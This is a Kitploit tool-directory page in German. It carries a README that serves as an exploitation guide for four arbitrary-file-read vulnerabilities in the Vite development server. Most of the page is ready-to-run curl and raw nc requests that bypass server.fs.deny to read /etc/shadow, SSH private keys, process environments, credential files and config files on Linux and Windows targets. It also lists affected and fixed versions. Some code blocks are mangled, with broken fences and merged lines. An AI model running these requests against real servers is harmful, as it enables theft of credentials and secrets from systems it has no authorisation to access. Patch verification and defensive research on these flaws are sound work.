Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-30208-31125-31486-32395 — Exploitationsanleitung und automatisiertes Erkennungsskript für vier Schwachstellen zum beliebigen Dateilesen im Vite-Entwicklungsserver (CVE-2025-30208/31125/31486/32395) mit Beispielen für Linux und Windows. | Kitploit
Tools/GitHubGitHub/nkuty/cve-2025-30208-31125-31486-32395
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubnkuty/cve-2025-30208-31125-31486-32395

CVE-2025-30208-31125-31486-32395

Exploitationsanleitung und automatisiertes Erkennungsskript für vier Schwachstellen zum beliebigen Dateilesen im Vite-Entwicklungsserver (CVE-2025-30208/31125/31486/32395) mit Beispielen für Linux und Windows.

Repository anzeigen
510vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Vite Schwachstellenausnutzung (CVE-2025-30208/31125/31486/32395)

Dieses Dokument fasst die Methoden zur Ausnutzung von vier beliebigen Dateilese-Schwachstellen im Vite-Entwicklungsserver zusammen, einschließlich Beispielen für Linux- und Windows-Systeme. Bitte beachten: Nur in autorisierten Sicherheitstestumgebungen verwenden.

Grundprinzip

Diese vier Schwachstellen im Vite-Entwicklungsserver ermöglichen es Angreifern, die server.fs.deny-Einschränkung zu umgehen und beliebige Dateien auf dem Server zu lesen. Jede Schwachstelle verwendet eine andere Umgehungstechnik, aber die grundlegenden Prinzipien sind ähnlich.

Auswirkungsbedingungen

Alle vier Schwachstellen erfordern die folgenden Bedingungen, um ausgenutzt werden zu können:

  1. Das Ziel verwendet eine betroffene Version des Vite-Entwicklungsservers
  2. Der Entwicklungsserver wird explizit im Netzwerk freigegeben (mit --host oder der server.host-Konfigurationsoption)
  3. Für CVE-2025-32395 muss der Server außerdem in einer Node- oder Bun-Umgebung (nicht Deno) ausgeführt werden

Ausnutzungsmethoden

1. CVE-2025-30208 (Umgehung durch abschließende Trennzeichen)

Betroffene Versionen: < 6.2.3, < 6.1.2, < 6.0.12, < 5.4.15, < 4.5.10

Behobene Versionen: 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10

Ausnutzungsprinzip: Durch Hinzufügen von ?raw?? oder ?import&raw??-Abfrageparametern in der URL wird die @fs-Pfadeinschränkung umgangen. Dies liegt daran, dass die abschließenden Trennzeichen (z. B. ?) an mehreren Stellen entfernt werden, aber im regulären Ausdruck der Abfragezeichenfolge nicht berücksichtigt werden.

Beispiele für Linux-Systeme:```bash

读取任意文件

curl "http://[目标IP]:5173/@fs/etc/passwd?raw??" curl "http://[目标IP]:5173/@fs/etc/passwd?import&raw??" curl "http://[目标IP]:5173/@fs/var/log/auth.log?raw??" curl "http://[目标IP]:5173/@fs/home/[用户名]/.ssh/id_rsa?raw??"

验证漏洞是否存在

curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误 curl "http://[目标IP]:5173/@fs/etc/passwd?raw??" # 如果返回文件内容,则存在漏洞

**Windows-Systemausnutzungsbeispiel**:```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?raw??"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/Desktop/credentials.txt?raw??"
curl "http://[目标IP]:5173/@fs/C:/inetpub/wwwroot/web.config?raw??"

# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini"  # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??"  # 如果返回文件内容,则存在漏洞

2. CVE-2025-31125 (Bypass durch bestimmte Importmethoden)

Betroffene Versionen: Gleiche wie CVE-2025-30208

Behobene Versionen: Gleiche wie CVE-2025-30208

Ausnutzungsprinzip: Durch die Verwendung bestimmter Importmethoden, wie ?inline&import oder ?raw?import, wird die server.fs.deny-Konfiguration umgangen.

Beispiel für die Ausnutzung unter Linux:```bash

读取任意文件

curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import" curl "http://[目标IP]:5173/@fs/etc/passwd?raw?import" curl "http://[目标IP]:5173/@fs/etc/shadow?inline&import" curl "http://[目标IP]:5173/@fs/proc/self/environ?inline&import"

验证漏洞是否存在

curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误 curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import" # 如果返回文件内容,则存在漏洞

**Beispiel für die Ausnutzung von Windows-Systemen**:```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Program Files/MySQL/MySQL Server 8.0/my.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt?inline&import"

# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini"  # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import"  # 如果返回文件内容,则存在漏洞

3. CVE-2025-31486 (SVG und Umgehung relativer Pfade)

Betroffene Versionen: < 6.2.5, < 6.1.4, < 6.0.14, < 5.4.17, < 4.5.12

Behobene Versionen: 6.2.5, 6.1.4, 6.0.14, 5.4.17, 4.5.12

Ausnutzungsprinzip:

  1. SVG-Umgehung: Durch Hinzufügen von ?.svg?.wasm?init oder Verwendung des sec-fetch-dest: script-Headers wird die Einschränkungsprüfung für .svg-Dateien umgangen
  2. Umgehung relativer Pfade: Ausnutzung der Prüfungslücke vor der ID-Normalisierung unter Verwendung relativer Pfade (wie ../../) zur Umgehung der Einschränkungen

Linux-System-Ausnutzungsbeispiel:```bash

SVG绕过方法

curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init" curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/etc/passwd?.svg" curl "http://[目标IP]:5173/etc/nginx/nginx.conf?.svg?.wasm?init" curl "http://[目标IP]:5173/var/www/html/config.php?.svg?.wasm?init"

相对路径绕过方法

curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw" curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw" curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../var/log/auth.log?import&?raw"

验证漏洞是否存在

curl "http://[目标IP]:5173/etc/passwd" # 应返回404错误 curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init" # 如果返回文件内容,则存在漏洞

**Beispiel für Windows-Nutzung**:```bash
# SVG绕过方法
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/C:/Windows/win.ini?.svg"
curl "http://[目标IP]:5173/C:/inetpub/wwwroot/web.config?.svg?.wasm?init"
curl "http://[目标IP]:5173/C:/Windows/Panther/Unattend.xml?.svg?.wasm?init"

# 相对路径绕过方法
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/system32/drivers/etc/hosts?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Users/Administrator/Desktop/credentials.txt?import&?raw"

# 验证漏洞是否存在
curl "http://[目标IP]:5173/C:/Windows/win.ini"  # 应返回404错误
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init"  # 如果返回文件内容,则存在漏洞

Hinweis: Die SVG-Umgehung funktioniert nur, wenn die Datei kleiner als build.assetsInlineLimit (Standard 4 kB) ist und Vite 6.0+ verwendet wird.

4. CVE-2025-32395 (Umgehung durch ungültiges Request-Ziel)

Betroffene Versionen: < 6.2.6, < 6.1.5, < 6.0.15, < 5.4.18, < 4.5.13

Behobene Versionen: 6.2.6, 6.1.5, 6.0.15, 5.4.18, 4.5.13

Ausnutzungsprinzip: Ausnutzung der Tatsache, dass das #-Zeichen im request-target gemäß HTTP 1.1-Spezifikation nicht erlaubt ist. In Node- und Bun-Laufzeiten werden diese Anfragen nicht intern abgewiesen, http.IncomingMessage.url enthält #, und Vite geht bei der Überprüfung von server.fs.deny fälschlicherweise davon aus, dass req.url kein # enthält.

Beispiel für die Ausnutzung unter Linux:```bash

使用curl的--request-target选项

curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd" "http://[目标IP]:5173" curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow" "http://[目标IP]:5173" curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../var/www/html/wp-config.php" "http://[目标IP]:5173"

或使用原始HTTP请求

echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173 echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173

Tool herunterladen